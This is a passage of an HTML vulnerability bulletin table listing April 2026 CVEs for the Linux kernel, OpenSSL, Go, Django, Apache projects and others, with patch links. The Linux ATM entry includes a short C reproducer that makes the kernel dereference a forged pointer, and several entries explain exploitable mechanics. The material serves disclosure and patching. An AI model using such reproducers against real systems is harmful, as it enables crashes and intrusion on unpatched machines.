    <td>In the Linux kernel, the following vulnerability has been resolved: net: atm: fix crash due to unvalidated vcc pointer in sigd_send() Reproducer available at [1]. The ATM send path (sendmsg -&gt; vcc_sendmsg -&gt; sigd_send) reads the vcc pointer from msg-&gt;vcc and uses it directly without any validation. This pointer comes from userspace via sendmsg() and can be arbitrarily forged: int fd = socket(AF_ATMSVC, SOCK_DGRAM, 0); ioctl(fd, ATMSIGD_CTRL); // become ATM signaling daemon struct msghdr msg = { .msg_iov = &amp;iov, ... }; *(unsigned long *)(buf + 4) = 0xdeadbeef; // fake vcc pointer sendmsg(fd, &amp;msg, 0); // kernel dereferences 0xdeadbeef In normal operation, the kernel sends the vcc pointer to the signaling daemon via sigd_enq() when processing operations like connect(), bind(), or listen(). The daemon is expected to return the same pointer when responding. However, a malicious daemon can send arbitrary pointer values. Fix this by introducing find_get_vcc() which validates the pointer by searching through vcc_hash (similar to how sigd_close() iterates over all VCCs), and acquires a reference via sock_hold() if found. Since struct atm_vcc embeds struct sock as its first member, they share the same lifetime. Therefore using sock_hold/sock_put is sufficient to keep the vcc alive while it is being used. Note that there may be a race with sigd_close() which could mark the vcc with various flags (e.g., ATM_VF_RELEASED) after find_get_vcc() returns. However, sock_hold() guarantees the memory remains valid, so this race only affects the logical state, not memory safety. [1]: https://gist.github.com/mrpre/1ba5949c45529c511152e2f4c755b0f3</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31411" target="_blank" rel="noopener">CVE-2026-31411</a></td>
    <td><a href="https://git.kernel.org/stable/c/c96549d07dfdd51aadf0722cfb40711574424840" target="_blank" rel="noopener">https://git.kernel.org/stable/c/c96549d07dfdd51aadf0722cfb40711574424840</a><br><a href="https://git.kernel.org/stable/c/1c8bda3df028d5e54134077dcd09f46ca8cfceb5" target="_blank" rel="noopener">https://git.kernel.org/stable/c/1c8bda3df028d5e54134077dcd09f46ca8cfceb5</a><br><a href="https://git.kernel.org/stable/c/3e1a8b00095246a9a2b46b57f6d471c6d3c00ed2" target="_blank" rel="noopener">https://git.kernel.org/stable/c/3e1a8b00095246a9a2b46b57f6d471c6d3c00ed2</a><br><a href="https://git.kernel.org/stable/c/e3f80666c2739296c3b69a127300455c43aa1067" target="_blank" rel="noopener">https://git.kernel.org/stable/c/e3f80666c2739296c3b69a127300455c43aa1067</a><br><a href="https://git.kernel.org/stable/c/21c303fec138c002f90ed33bce60e807d53072bb" target="_blank" rel="noopener">https://git.kernel.org/stable/c/21c303fec138c002f90ed33bce60e807d53072bb</a><br><a href="https://git.kernel.org/stable/c/69d3f9ee5489e6e8b66defcfa226e91d82393297" target="_blank" rel="noopener">https://git.kernel.org/stable/c/69d3f9ee5489e6e8b66defcfa226e91d82393297</a><br><a href="https://git.kernel.org/stable/c/440c9a5fc477a8ee259d8bf669531250b8398651" target="_blank" rel="noopener">https://git.kernel.org/stable/c/440c9a5fc477a8ee259d8bf669531250b8398651</a><br><a href="https://git.kernel.org/stable/c/ae88a5d2f29b69819dc7b04086734439d074a643" target="_blank" rel="noopener">https://git.kernel.org/stable/c/ae88a5d2f29b69819dc7b04086734439d074a643</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
    <td>In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_mass_storage: Fix potential integer overflow in check_command_size_in_blocks() The `check_command_size_in_blocks()` function calculates the data size in bytes by left shifting `common-&gt;data_size_from_cmnd` by the block size (`common-&gt;curlun-&gt;blkbits`). However, it does not validate whether this shift operation will cause an integer overflow. Initially, the block size is set up in `fsg_lun_open()`, and the `common-&gt;data_size_from_cmnd` is set up in `do_scsi_command()`. During initialization, there is no integer overflow check for the interaction between two variables. So if a malicious USB host sends a SCSI READ or WRITE command requesting a large amount of data (`common-&gt;data_size_from_cmnd`), the left shift operation can wrap around. This results in a truncated data size, which can bypass boundary checks and potentially lead to memory corruption or out-of-bounds accesses. Fix this by using the check_shl_overflow() macro to safely perform the shift and catch any overflows.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31412" target="_blank" rel="noopener">CVE-2026-31412</a></td>
    <td><a href="https://git.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5d01125cc" target="_blank" rel="noopener">https://git.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5d01125cc</a><br><a href="https://git.kernel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b" target="_blank" rel="noopener">https://git.kernel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b</a><br><a href="https://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5" target="_blank" rel="noopener">https://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5</a><br><a href="https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3" target="_blank" rel="noopener">https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3</a><br><a href="https://git.kernel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac" target="_blank" rel="noopener">https://git.kernel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac</a><br><a href="https://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1" target="_blank" rel="noopener">https://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
    <td>In the Linux kernel, the following vulnerability has been resolved: bpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR maybe_fork_scalars() is called for both BPF_AND and BPF_OR when the source operand is a constant. When dst has signed range [-1, 0], it forks the verifier state: the pushed path gets dst = 0, the current path gets dst = -1. For BPF_AND this is correct: 0 &amp; K == 0. For BPF_OR this is wrong: 0 | K == K, not 0. The pushed path therefore tracks dst as 0 when the runtime value is K, producing an exploitable verifier/runtime divergence that allows out-of-bounds map access. Fix this by passing env-&gt;insn_idx (instead of env-&gt;insn_idx + 1) to push_stack(), so the pushed path re-executes the ALU instruction with dst = 0 and naturally computes the correct result for any opcode.</td>
    <td>2026-04-12</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31413" target="_blank" rel="noopener">CVE-2026-31413</a></td>
    <td><a href="https://git.kernel.org/stable/c/342aa1ee995ef5bbf876096dc3a5e51218d76fa4" target="_blank" rel="noopener">https://git.kernel.org/stable/c/342aa1ee995ef5bbf876096dc3a5e51218d76fa4</a><br><a href="https://git.kernel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7" target="_blank" rel="noopener">https://git.kernel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7</a><br><a href="https://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455" target="_blank" rel="noopener">https://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455</a><br><a href="https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942550910c5" target="_blank" rel="noopener">https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942550910c5</a></td>
    </tr>

    <tr>
    <td class="vendor-product">OpenSSL--OpenSSL</td>
    <td>Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31789" target="_blank" rel="noopener">CVE-2026-31789</a></td>
    <td><a href="https://openssl-library.org/news/secadv/20260407.txt" target="_blank" rel="noopener">OpenSSL Advisory</a><br><a href="https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9" target="_blank" rel="noopener">3.6.2 git commit</a><br><a href="https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49" target="_blank" rel="noopener">3.5.6 git commit</a><br><a href="https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde" target="_blank" rel="noopener">3.4.5 git commit</a><br><a href="https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf" target="_blank" rel="noopener">3.3.7 git commit</a><br><a href="https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521" target="_blank" rel="noopener">3.0.20 git commit</a></td>
    </tr>

    <tr>
    <td class="vendor-product">OpenSSL--OpenSSL</td>
    <td>Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer. Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker. RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext. As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31790" target="_blank" rel="noopener">CVE-2026-31790</a></td>
    <td><a href="https://openssl-library.org/news/secadv/20260407.txt" target="_blank" rel="noopener">OpenSSL Advisory</a><br><a href="https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482" target="_blank" rel="noopener">3.6.2 git commit</a><br><a href="https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac" target="_blank" rel="noopener">3.5.6 git commit</a><br><a href="https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790" target="_blank" rel="noopener">3.4.5 git commit</a><br><a href="https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406" target="_blank" rel="noopener">3.3.7 git commit</a><br><a href="https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e" target="_blank" rel="noopener">3.0.20 git commit</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Sonatype--Nexus Repository</td>
    <td>A vulnerability in the task management component of Sonatype Nexus Repository versions 3.22.1 through 3.90.2 allows an authenticated attacker with task creation permissions to execute arbitrary code, bypassing the nexus.scripts.allowCreation security control.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3199" target="_blank" rel="noopener">CVE-2026-3199</a></td>
    <td><a href="https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html" target="_blank" rel="noopener">https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html</a><br><a href="https://support.sonatype.com/hc/en-us/articles/50615414548499" target="_blank" rel="noopener">https://support.sonatype.com/hc/en-us/articles/50615414548499</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Erlang--OTP</td>
    <td>Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows OCSP designated-responder authorization bypass via missing signature verification. The OCSP response validation in public_key:pkix_ocsp_validate/5 does not verify that a CA-designated responder certificate was cryptographically signed by the issuing CA. Instead, it only checks that the responder certificate's issuer name matches the CA's subject name and that the certificate has the OCSPSigning extended key usage. An attacker who can intercept or control OCSP responses can create a self-signed certificate with a matching issuer name and the OCSPSigning EKU, and use it to forge OCSP responses that mark revoked certificates as valid. This affects SSL/TLS clients using OCSP stapling, which may accept connections to servers with revoked certificates, potentially transmitting sensitive data to compromised servers. Applications using the public_key:pkix_ocsp_validate/5 API directly are also affected, with impact depending on usage context. This vulnerability is associated with program files lib/public_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3. This issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10 corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 until 11.5.4 and 11.2.12.7.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32144" target="_blank" rel="noopener">CVE-2026-32144</a></td>
    <td><a href="https://github.com/erlang/otp/security/advisories/GHSA-gxrm-pf64-99xm" target="_blank" rel="noopener">https://github.com/erlang/otp/security/advisories/GHSA-gxrm-pf64-99xm</a><br><a href="https://cna.erlef.org/cves/CVE-2026-32144.html" target="_blank" rel="noopener">https://cna.erlef.org/cves/CVE-2026-32144.html</a><br><a href="https://osv.dev/vulnerability/EEF-CVE-2026-32144" target="_blank" rel="noopener">https://osv.dev/vulnerability/EEF-CVE-2026-32144</a><br><a href="https://www.erlang.org/doc/system/versions.html#order-of-versions" target="_blank" rel="noopener">https://www.erlang.org/doc/system/versions.html#order-of-versions</a><br><a href="https://github.com/erlang/otp/commit/ac7ff528be857c5d35eb29c7f24106e3a16d4891" target="_blank" rel="noopener">https://github.com/erlang/otp/commit/ac7ff528be857c5d35eb29c7f24106e3a16d4891</a><br><a href="https://github.com/erlang/otp/commit/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e0c0" target="_blank" rel="noopener">https://github.com/erlang/otp/commit/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e0c0</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Gleam--Gleam</td>
    <td>Improper path validation vulnerability in the Gleam compiler's handling of git dependencies allows arbitrary file system modification during dependency download. Dependency names from gleam.toml and manifest.toml are incorporated into filesystem paths without sufficient validation or confinement to the intended dependency directory, allowing attacker-controlled paths (via relative traversal such as ../ or absolute paths) to target filesystem locations outside that directory. When resolving git dependencies (e.g. via gleam deps download), the computed path is used for filesystem operations including directory deletion and creation. This vulnerability occurs during the dependency resolution and download phase, which is generally expected to be limited to fetching and preparing dependencies within a confined directory. A malicious direct or transitive git dependency can exploit this issue to delete and overwrite arbitrary directories outside the intended dependency directory, including attacker-chosen absolute paths, potentially causing data loss. In some environments, this may be further leveraged to achieve code execution, for example by overwriting git hooks or shell configuration files. This issue affects Gleam from 1.9.0-rc1 until 1.15.3 and 1.16.0-rc1.</td>
    <td>2026-04-11</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32146" target="_blank" rel="noopener">CVE-2026-32146</a></td>
    <td><a href="https://github.com/gleam-lang/gleam/security/advisories/GHSA-vq5j-55vx-wq8j" target="_blank" rel="noopener">https://github.com/gleam-lang/gleam/security/advisories/GHSA-vq5j-55vx-wq8j</a><br><a href="https://cna.erlef.org/cves/CVE-2026-32146.html" target="_blank" rel="noopener">https://cna.erlef.org/cves/CVE-2026-32146.html</a><br><a href="https://osv.dev/vulnerability/EEF-CVE-2026-32146" target="_blank" rel="noopener">https://osv.dev/vulnerability/EEF-CVE-2026-32146</a><br><a href="https://github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf" target="_blank" rel="noopener">https://github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf</a><br><a href="https://github.com/gleam-lang/gleam/commit/55bb36e6d7febfbbc48c4d001e0ae13eb0312d78" target="_blank" rel="noopener">https://github.com/gleam-lang/gleam/commit/55bb36e6d7febfbbc48c4d001e0ae13eb0312d78</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Go standard library--crypto/x509</td>
    <td>During chain building, the amount of work that is done is not correctly limited when a large number of intermediate certificates are passed in VerifyOptions.Intermediates, which can lead to a denial of service. This affects both direct users of crypto/x509 and users of crypto/tls.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32280" target="_blank" rel="noopener">CVE-2026-32280</a></td>
    <td><a href="https://go.dev/cl/758320" target="_blank" rel="noopener">https://go.dev/cl/758320</a><br><a href="https://go.dev/issue/78282" target="_blank" rel="noopener">https://go.dev/issue/78282</a><br><a href="https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target="_blank" rel="noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU</a><br><a href="https://pkg.go.dev/vuln/GO-2026-4947" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4947</a></td>
    </tr>

    <td class="vendor-product">Go standard library--crypto/x509</td>
    <td>Validating certificate chains which use policies is unexpectedly inefficient when certificates in the chain contain a very large number of policy mappings, possibly causing denial of service. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32281" target="_blank" rel="noopener">CVE-2026-32281</a></td>

    <a href="https://go.dev/cl/758061" target="_blank" rel="noopener">https://go.dev/cl/758061</a><br><a href="https://go.dev/issue/78281" target="_blank" rel="noopener">https://go.dev/issue/78281</a><br><a href="https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target="_blank" rel="noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU</a><br><a href="https://pkg.go.dev/vuln/GO-2026-4946" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4946</a></td>
    </tr>

    <td class="vendor-product">Go standard library--internal/syscall/unix</td>
    <td>On Linux, if the target of Root.Chmod is replaced with a symlink while the chmod operation is in progress, Chmod can operate on the target of the symlink, even when the target lies outside the root. The Linux fchmodat syscall silently ignores the AT_SYMLINK_NOFOLLOW flag, which Root.Chmod uses to avoid symlink traversal. Root.Chmod checks its target before acting and returns an error if the target is a symlink lying outside the root, so the impact is limited to cases where the target is replaced with a symlink between the check and operation.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32282" target="_blank" rel="noopener">CVE-2026-32282</a></td>

    <a href="https://go.dev/cl/763761" target="_blank" rel="noopener">https://go.dev/cl/763761</a><br><a href="https://go.dev/issue/78293" target="_blank" rel="noopener">https://go.dev/issue/78293</a><br><a href="https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target="_blank" rel="noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU</a><br><a href="https://pkg.go.dev/vuln/GO-2026-4864" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4864</a></td>
    </tr>

    <td class="vendor-product">Go standard library--crypto/tls</td>
    <td>If one side of the TLS connection sends multiple key update messages post-handshake in a single record, the connection can deadlock, causing uncontrolled consumption of resources. This can lead to a denial of service. This only affects TLS 1.3.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32283" target="_blank" rel="noopener">CVE-2026-32283</a></td>

    <a href="https://go.dev/cl/763767" target="_blank" rel="noopener">https://go.dev/cl/763767</a><br><a href="https://go.dev/issue/78334" target="_blank" rel="noopener">https://go.dev/issue/78334</a><br><a href="https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target="_blank" rel="noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU</a><br><a href="https://pkg.go.dev/vuln/GO-2026-4870" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4870</a></td>
    </tr>

    <td class="vendor-product">Go standard library--archive/tar</td>
    <td>tar.Reader can allocate an unbounded amount of memory when reading a maliciously-crafted archive containing a large number of sparse regions encoded in the "old GNU sparse map" format.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32288" target="_blank" rel="noopener">CVE-2026-32288</a></td>

    <a href="https://go.dev/cl/763766" target="_blank" rel="noopener">https://go.dev/cl/763766</a><br><a href="https://go.dev/issue/78301" target="_blank" rel="noopener">https://go.dev/issue/78301</a><br><a href="https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target="_blank" rel="noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU</a><br><a href="https://pkg.go.dev/vuln/GO-2026-4869" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4869</a></td>
    </tr>

    <td class="vendor-product">Go standard library--html/template</td>
    <td>Context was not properly tracked across template branches for JS template literals, leading to possibly incorrect escaping of content when branches were used. Additionally, template actions within JS template literals did not properly track the brace depth, leading to incorrect escaping being applied. These issues could cause actions within JS template literals to be incorrectly or improperly escaped, leading to XSS vulnerabilities.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32289" target="_blank" rel="noopener">CVE-2026-32289</a></td>

    <a href="https://go.dev/cl/763762" target="_blank" rel="noopener">https://go.dev/cl/763762</a><br><a href="https://go.dev/issue/78331" target="_blank" rel="noopener">https://go.dev/issue/78331</a><br><a href="https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target="_blank" rel="noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU</a><br><a href="https://pkg.go.dev/vuln/GO-2026-4865" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4865</a></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Cassandra</td>
    <td>Authenticated DoS over CQL in Apache Cassandra 4.0, 4.1, 5.0 allows an authenticated user to raise query latencies via repeated password changes. Users are recommended to upgrade to version 4.0.20, 4.1.11, 5.0.7, which fixes this issue.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32588" target="_blank" rel="noopener">CVE-2026-32588</a></td>

    <a href="https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc" target="_blank" rel="noopener">https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc</a></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Tomcat</td>
    <td>Improper Input Validation vulnerability in Apache Tomcat due to an incomplete fix of CVE-2025-66614. This issue affects Apache Tomcat: from 11.0.15 through 11.0.19, from 10.1.50 through 10.1.52, from 9.0.113 through 9.0.115. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32990" target="_blank" rel="noopener">CVE-2026-32990</a></td>

    <a href="https://lists.apache.org/thread/1nl9zqft0ksqlhlkd3j4obyjz1ghoyn7" target="_blank" rel="noopener">https://lists.apache.org/thread/1nl9zqft0ksqlhlkd3j4obyjz1ghoyn7</a></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache OpenMeetings</td>
    <td>Improper Handling of Insufficient Privileges vulnerability in Apache OpenMeetings. Any registered user can query the web service with their credentials and get files/sub-folders of any folder by ID (metadata only, NOT contents). Metadata includes id, type, name and some other fields. The full list of fields can be checked in the FileItemDTO object. This issue affects Apache OpenMeetings: from 3.10 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33005" target="_blank" rel="noopener">CVE-2026-33005</a></td>

    <a href="https://openmeetings.apache.org/openmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html" target="_blank" rel="noopener">https://openmeetings.apache.org/openmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html</a><br><a href="https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7" target="_blank" rel="noopener">https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7</a></td>
    </tr>

    <td class="vendor-product">djangoproject--Django</td>
    <td>An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. `MultiPartParser` allows remote attackers to degrade performance by submitting multipart uploads with `Content-Transfer-Encoding: base64` including excessive whitespace. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Seokchan Yoon for reporting this issue.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33033" target="_blank" rel="noopener">CVE-2026-33033</a></td>

    <a href="https://docs.djangoproject.com/en/dev/releases/security/" target="_blank" rel="noopener">Django security archive</a><br><a href="https://groups.google.com/g/django-announce" target="_blank" rel="noopener">Django releases announcements</a><br><a href="https://www.djangoproject.com/weblog/2026/apr/07/security-releases/" target="_blank" rel="noopener">Django security releases issued: 6.0.4, 5.2.13, and 4.2.30</a></td>
    </tr>

    <td class="vendor-product">djangoproject--Django</td>
    <td>An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. ASGI requests with a missing or understated `Content-Length` header could bypass the `DATA_UPLOAD_MAX_MEMORY_SIZE` limit when reading `HttpRequest.body`, allowing remote attackers to load an unbounded request body into memory. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Superior for reporting this issue.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33034" target="_blank" rel="noopener">CVE-2026-33034</a></td>

    <a href="https://docs.djangoproject.com/en/dev/releases/security/" target="_blank" rel="noopener">Django security archive</a><br><a href="https://groups.google.com/g/django-announce" target="_blank" rel="noopener">Django releases announcements</a><br><a href="https://www.djangoproject.com/weblog/2026/apr/07/security-releases/" target="_blank" rel="noopener">Django security releases issued: 6.0.4, 5.2.13, and 4.2.30</a></td>
    </tr>

    <td class="vendor-product">Six Apart Ltd.--Movable Type</td>
    <td>Movable Type provided by Six Apart Ltd. contains an SQL Injection vulnerability which may allow an attacker to execute an arbitrary SQL statement.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33088" target="_blank" rel="noopener">CVE-2026-33088</a></td>

    <a href="https://movabletype.org/news/2026/04/mt-907-released.html" target="_blank" rel="noopener">https://movabletype.org/news/2026/04/mt-907-released.html</a><br><a href="https://www.sixapart.jp/movabletype/news/2026/04/08-1100.html" target="_blank" rel="noopener">https://www.sixapart.jp/movabletype/news/2026/04/08-1100.html</a><br><a href="https://jvn.jp/en/jp/JVN66473735/" target="_blank" rel="noopener">https://jvn.jp/en/jp/JVN66473735/</a></td>
    </tr>

    <td class="vendor-product">Acronis--Acronis True Image OEM</td>
    <td>Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33092" target="_blank" rel="noopener">CVE-2026-33092</a></td>

    <a href="https://security-advisory.acronis.com/advisories/SEC-9407" target="_blank" rel="noopener">SEC-9407</a></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache ActiveMQ Client</td>
    <td>Improper validation and restriction of a classpath path name vulnerability in Apache ActiveMQ Client, Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ Web, Apache ActiveMQ. In two instances (when creating a Stomp consumer and also browsing messages in the Web console) an authenticated user provided "key" value could be constructed to traverse the classpath due to path concatenation. As a result, the application is exposed to a classpath path resource loading vulnerability that could potentially be chained together with another attack to lead to exploit. This issue affects Apache ActiveMQ Client: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Broker: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ All: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Web: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ: before 5.19.3, from 6.0.0 before 6.2.2. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue. Note: 5.19.3 and 6.2.2 also fix this issue, but that is limited to non-Windows environments due to a path separator resolution bug fixed in 5.19.4 and 6.2.3.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33227" target="_blank" rel="noopener">CVE-2026-33227</a></td>

    <a href="https://activemq.apache.org/security-advisories.data/CVE-2026-33227-announcement.txt" target="_blank" rel="noopener">https://activemq.apache.org/security-advisories.data/CVE-2026-33227-announcement.txt</a></td>
    </tr>

    <td class="vendor-product">xwiki--xwiki-platform</td>
